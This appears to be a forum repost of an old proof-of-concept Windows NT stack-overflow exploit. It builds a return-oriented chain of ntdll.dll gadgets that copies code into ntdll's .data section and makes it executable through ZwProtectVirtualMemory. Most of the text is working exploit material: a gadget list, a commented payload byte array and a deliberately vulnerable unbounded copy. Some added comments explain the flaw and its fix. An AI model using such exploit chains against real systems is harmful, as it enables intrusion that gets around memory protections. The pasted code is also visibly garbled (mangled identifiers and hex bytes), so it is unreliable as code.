-------------------------------------------------- ---------- from:
Hi, I'm posting here a way of avoiding stack guards: shellcode without zero bytes.
/****************************************************************/
/* Shellcode Avoiding Stack Protections Sample -------- Vallez / 29A */
/****************************************************************/
/* We have all heard about stack protections. Security products protect the stack against code executed there. New hardware does too: it will not let you execute code in non-executable memory (amd64, for example).
Writing shellcode that gets around this is not very complex, as I will show with this small sample.
The idea is to use pieces of code from DLLs. In this code I am using pieces of code from ntdll for my purposes. How? Easy: with the stack overflow we leave return addresses on the stack that direct our thread to code in NTDLL.DLL. Exactly these code fragments of ntdll are used:
-------------------------------------------------- -----------------------------------------
.78462fdf: ab stosd.78462fe0: 5f pop EDI.78462FE1: C20400 RETN 00004
-------------------------------------------------- -----------------------------------------
.784635ec: 8bc6 MOV Eax, ESI.784635EE: 5F POP EDI.784635EF: 5E POP ESI.784635F0: C3 RETN
-------------------------------------------------- -----------------------------------------
.7849da92: 0fc8 bswap EAX.7849DA94: C3 RETN ----------------------------------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------- -
.784680DA: CD2E INT 02E.784680DC: C3 RETN
-------------------------------------------------- -----------------------------------------
.784AFAAD: POP EAX RETN
-------------------------------------------------- -----------------------------------------
.7846bbe8: POP ECX RETN
-------------------------------------------------- -----------------------------------------
.784633AF: SUB EAX, ECX SAR Eax, 1 DEC EAX RETN
-------------------------------------------------- -----------------------------------------
.78466B22: SUB EX, ECX POP EDI POP ESI POP EBX RETN C
-------------------------------------------------- -----------------------------------------
.78499442: POP EDX RETN
-------------------------------------------------- ----------------------------------------- */
/* This sample will work with ntdll version 5.0.2195.6899. The code should be compiled with Visual Studio 6.0 in debug with the default project options (really, just open the .c in Visual Studio and press F7, and yes, yes...). */
#include
#define debugz
#ifdef debugz
/* For debugging we have activated debugz to hand the shellcode directly to func(), but this shellcode could also be passed in as argv[1].
*/
Char Exploit [] = {'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A' ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ', 0xAD, 0xfa, 0x4a, 0x78, // Here we are overwriting return eip func () goto pop eax / round0x90,0x90,0x90,0 x90, 0x90,0x90,0x90, // this nops are part of the code That We will dump to .data of NTDLL EAX = 0x909090900xe0, 0x2f, 0x46, 0x78, // goto pop EDI / RETN4 0X21, 0X21, 0X4B, 0X78, // EDI = 0x784621210XDF, 0x2F, 0x46, 0X78, // goto stosd / pop eDi / RETN 4'A ', 'A', 'A', 'A', // Trash for Retn40x21 4,0x21,0x4b, 0x78, // next part of ntdll .data where we will write out d o0xad, 0xfa, 0x4a, 0x78, // goto Pop Eax / Retn'A ',' A ',' A ',' A ', 0x90, 0x90, 0x90, 0x90, // This Nops Are Part of The Code That We Will Dump To .data of NTDLL0XDF, 0x2F, 0x46 , 0x78, // goto stosd / pop eDI / RETN 40X21 8, 0X21, 0X4B, 0x78, // Next Part of NTDLL .DATA WHERE WE WILL WRITEURE CODE0XAD, 0XFA, 0X4A, 0X78, // Goto Pop Eax / Retn 'a', 'a', 'a', 'a', 0x90, 0x90, 0x90,0xcc, // this nops area part of the code That We will dump to .data of ntdll0xdf, 0x2 F, 0x46,0x78, // goto stosd / pop edi / retn 4 // start with parameters // now we should give execution access to .data with // ZwVirtualProtectMemory (0xFFFFFFFF, 0x784b2121,0x000000ff, 0x00000040,0x784b2121 0x70); 0x21 0x30, 0x21, 0x4b, 0x78, // next part of ntdll.data where we will write u d a w, 0xfa, 0x4a, 0x78, // goto pop eax / ran'a ','
A ',' A ',' A ', 0xFF, 0xFF, 0xFF, 0xFF, // Parameters for ZWVIRTUALPROTECTMEMORY. this process, 0xffffffffff.0xdf, 0x2f, 0x46,0x78, // goto stosd / pop EDI / RETN 40X21 0x34 , 0x21, 0x4b, 0x78, // next part of ntdll .data where we will write out0xad, 0xfa, 0x4a, 0x78, // goto pop eax / ran'a ',' a ',' a ',' a ' , 0x21 0x58,0x21,0x4b, 0x78, // parameters for ZwVirtualProtectMemory. addr of variable keeping addr of mem0xDF, 0x2F, 0x46,0x78, // goto stosd / pop edi / retn 40x21 0x58,0x21,0x4b, 0x78, // we must write here the add do executable0xad, 0xfa, 0x4a, 0x78, // goto pop eax = 0x784b2121'a ',' a ',' a ',' a ', // trash for RETN 40X21, 0X21, 0X4B, 0x78, // for Poping to Eax0xdf, 0x2f, 0x46,0x78, // goto stosd / pop EDI / REN 4'A ',' A ',' A ',' A ', // Trash for edi // the next parameter Has Zeros, So We Cant Have It in shellcode.we Will get in Eax = 0x00000040
0xAD, 0xfa, 0x4a, 0x78, // goto pop eax = 0xffffffff'A ',' a ',' a ',' a ', // trash for Retn 40xFF, 0xFF, 0xFF, 0xFF, 0xE8, 0XBB, 0X46, 0x78, // goto pop ECX = 0xfffffBF0xFF, 0xFF, 0xFF, 0xBF, 0x22, 0X6B, 0X46, 0X78, // Goto Sub EAX, ECX / POP EDI / POP ESI / POP EBX / RETN C0x21 0x3c, 0x21, 0x4b, 0x78, // other addr in .data'a ',' A ',' A ',' A ',' A ',' A ',' A ',' A ', 0x92, 0xDA, 0x49, 0x78, / / GOTO BSWAP EAX, RETN'A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ', 'a', 0xDF, 0x2F, 0x46, 0x78, // goto stosd / pop eDI / RETN 4 // EAX = 0x00000040 EDI = Next Addr We Will Write 0x40, Flags0x21 0x54, 0x21, 0x4b, 0x78, // Other AddR IN.DATA0XDF, 0x2F, 0x46, 0x78, // goto stosd / pop EDI / RETN 4'A ',' A ',' A ',' A ', 0x21 0x40, 0x21, 0x4b, 0x78, // Next Part of NTDLL.DATA WHERE WE WILL WRITE PARAMS0XAD, 0xFA, 0x4A, 0x78, // Goto Pop Eax / Retn'A ',' A ',' A ',' A ', 0x21 0x50, 0x21, 0x4b, 0x78, / / old protect returned as IO param in ZwVirtualProtectMemory0xDF, 0x2F, 0x46,0x78, // goto stosd / pop edi / retn 40x21 0x38,0x21,0x4b, 0x78, // other part to write, in this case the addr of the variable Storing Size for API0XA D, 0xfa, 0x4a, 0x78, // goto pop eax / Retn'A ',' a ',' a ',' a ', 0x21 0x54, 0x21, 0x4b, 0x78, // addr where size is stored, poped With pop eax0xdf, 0x2f, 0x46,0x78, // goto stosd / pop eDI / RETN 4'A ',' A ',' A ',' A ', // Trash for Poping to EDI // NOW WE MUST CALL INT 2e with eax = 0x77 and edx = 0x784b2151
0xAD, 0xfa, 0x4a, 0x78, // goto pop eax = 0xffffffff'A ',' a ',' a ',' a ', // trash0xff, 0xFF, 0xFF, 0xFF, 0xE8, 0XBB, 0X46, 0X78, / / goto pop ecx = 0xffffff880xff, 0xff, 0xff, 0x88, 0x22,0x6b, 0x46,0x78, // goto Sub Eax, ECX / POP EDI / POP ESI / POP EBX / RETN C'A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ', 0x42, 0X94, 0X49, 0X78, // goto POP EDX, RETN'A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ' , 0x21 0x30, 0x21, 0x4b, 0x78, // pop to edx address of params for zwvirtualprotectMemory0x92,0x4,0x49,0x78, // goto bswap eax, retrn // EAX = 0x77 (Service ID) EDX-> params0XDA, 0x80 , 0x46, 0x78, // goto int 2e, Retn0x21,0x21,0x4b, 0x78, // we have copied all the code what we need, so we jump what code in .data of NTDLL.
}; char * pexploit [2] = {EXPLOIT, EXPLOIT}; # Endif
/*
 * func(argc, argv) -- the deliberately vulnerable sink of this sample.
 *
 * Copies argv[1] into a 30-byte stack buffer with an unbounded copy (the
 * call name is garbled in this copy of the source; presumably strcpy), so
 * any argument longer than the buffer runs past it and over the saved
 * return address. That overwrite is all the payload above needs: it
 * supplies the chain of ntdll return addresses the rest of the post walks
 * through.
 *
 * Defensive note: the overflow is closed by checking the argument length
 * against sizeof buffer before copying, or by a bounded copy with explicit
 * termination. A non-executable stack does not help against this sample
 * because nothing is executed from the stack -- only addresses are read
 * from it.
 *
 * NOTE(review): the parameter is spelled "Argc" but the body tests "argc";
 * C is case-sensitive, so the text as pasted would not compile. Treat that
 * casing (and "Void", "IF", "struffpy") as extraction damage, not intent.
 */
Void Func (int Argc, char ** argv) {
    char buffer [30];
    /* Copies only when an argument exists; nothing bounds its length. */
    IF (argc> 1) {
        struffpy (buffer, argv [1]);
    }
}
/*
 * Program entry.
 *
 * With debugz defined (it is, see the #define above) the embedded payload
 * array is handed to func() as a fake argv (pexploit = { EXPLOIT, EXPLOIT },
 * so argv[1] is the payload); without it, func() receives the real argv and
 * the overflow is driven by whatever is passed on the command line.
 *
 * Note that the real argc is forwarded in both cases and func() only copies
 * when argc > 1, so even the debug build must be started with at least one
 * argument for the copy to run.
 *
 * NOTE(review): "Argc"/"argc" and "Func"/"func" differ in case in this
 * pasted copy; presumably all lowercase in the original source.
 */
Void main (int Argc, char ** argv) {
#ifndef debugz
    func (argc, argv);        /* normal path: input comes from the command line */
# else
    func (argc, pexploit);    /* debug path: payload array stands in for argv */
# endif
}
/* This is an example for Windows NT with NTDLL.DLL version 5.0.2195.6899. It is only a proof of concept of how shellcode could avoid stack protections.
This shellcode is not executed on the stack; instead the stack holds the values that direct the thread into ntdll code and force that code to write the executable code into ntdll's .data section. If not today, then in the future all non-executable memory will be protected against execution, so we call ZwProtectVirtualMemory to mark the .data region we have written to as executable (for this purpose we dump the API's parameters to another part of .data, then point edx at those parameters and call int 2e with eax = 0x77, the service id). */ /*
Parts of NTDLL:
-------------------------------------------------- -----------------------------------------
.78462fdf: ab stosd.78462fe0: 5f pop EDI.78462FE1: C20400 RETN 00004
-------------------------------------------------- -----------------------------------------
.784635ec: 8bc6 MOV Eax, ESI.784635EE: 5F POP EDI.784635EF: 5E POP ESI.784635F0: C3 RETN
-------------------------------------------------- -----------------------------------------
.7849da92: 0fc8 bswap eax.7849da94: c3 retent
-------------------------------------------------- -----------------------------------------
.784680DA: CD2E INT 02E.784680DC: C3 RETN
-------------------------------------------------- -----------------------------------------
.784AFAAD: POP EAX RETN
-------------------------------------------------- -----------------------------------------
.7846bbe8: pop ECX RETN ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ -----------------------------------------------
.784633AF: SUB EAX, ECX SAR Eax, 1 DEC EAX RETN
-------------------------------------------------- -----------------------------------------
.78466B22: SUB EX, ECX POP EDI POP ESI POP EBX RETN C
-------------------------------------------------- -----------------------------------------
.78499442: POP EDX RETN
-------------------------------------------------- -----------------------------------------
.data (NTDLL.DLL) at 784B0000 --- for copying the code there.
Number Name VirtSize RVA PhysSize Offset Flag- 1 .text 00045CAB 00001000 00045E00 00000400 60000020 2 ECODE 00004371 00047000 00004400 00046200 60000020 3 PAGE 00003FEB 0004C000 00004000 0004A600 60000020 4 .data 00002D84 00050000 00002200 0004E600 C0000040 5 .rsrc 0002D000 00053000 0002C400 00050800 40000040 6 .reloc 00002010 000800 0000200 0007CC00 42000040
-------------------------------------------------- -----------------------------------------
Info on my NTDLL:
----------------
Version: 5.0.2195.6899 Count of sections 6 Machine intel386 Symbol table 00000000 [00000000] Wed Mar 24 03:17:14 2004 Size of optional header 00E0 Magic optional header 010B Linker version 5.12 OS version 5.00 Image version 5.00 Subsystem version 4.00 Entry point 00000000 Size of code 0004E200 Size of init data 00030800 Size of uninit data 00000000 Size of image 00083000 Size of header 00000400 Base of code 00001000 Base of data 0004E000 Image base 78460000 Subsystem Windows char Section alignment 00001000 File alignment 00000200 stack 00040000/00001000 Checksum 00082A23 Number of directories 16 */
-------------------------------------------------- ------------